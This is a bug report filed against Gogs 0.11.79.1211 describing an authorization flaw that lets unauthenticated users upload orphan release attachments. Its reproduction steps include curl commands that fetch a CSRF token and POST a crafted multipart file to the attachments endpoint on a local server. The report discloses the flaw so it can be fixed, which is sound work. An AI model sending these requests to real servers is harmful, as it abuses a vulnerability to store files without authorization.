Label: 💊 bug (Something isn't working)
Describe the bug
It's possible to upload a release attachment file without having a valid repository/release and without a valid user account, even if DISABLE_REGISTRATION is set to true in the app.ini configuration file.
The bug/vulnerability is not present if REQUIRE_SIGNIN_VIEW is set to true, since all requests are then answered with a 302 redirect to the login page.
To Reproduce
Steps to reproduce the behavior, assuming that the server runs on http://127.0.0.1:3000:

1. From a Linux/Unix/Windows-subsystem terminal
2. Type the following command:

   ```
   curl -s http://127.0.0.1:3000/ | grep csrf
   ```

3. Copy the CSRF token from the output of the command above
4. Create a file named request.txt with the following content:

   ```
   --boundary
   Content-Disposition: form-data; name="file"; filename="test.txt"

   test_test
   --boundary--
   ```

5. Type the following command. NOTE: replace `<token>` with the CSRF token from step 3.

   ```
   curl -kis -X 'POST' -H 'X-Csrf-Token: <token>' -H 'Content-Type: multipart/form-data; boundary=boundary' -b 'lang=en-US; _csrf=<token>' --data-binary @request.txt 'http://127.0.0.1:3000/releases/attachments'
   ```

The command makes a multipart request to the `releases/attachments` endpoint with the data from the file request.txt from step 4. The server replies with a UUID for the attachment file; visit the page at http://127.0.0.1:3000/attachments/<uuid> to see it.
Expected behavior
The server should check when someone is uploading orphan attachments (attachments not bound to a valid repository and release) and refuse to save files for invalid repositories/releases and for unauthenticated users.
Additional context
- Gogs version (or commit ref): 0.11.79.1211
- Git version: 1.10.2
- Operating system: Ubuntu
- Database:
  - PostgreSQL
  - MySQL
  - MSSQL
  - SQLite
- Can you reproduce the bug at https://try.gogs.io:
  - Yes
  - No. Since REQUIRE_SIGNIN_VIEW is set to true, all requests are answered with a 302 redirect to the login page.
- Log gist (usually found in log/gogs.log):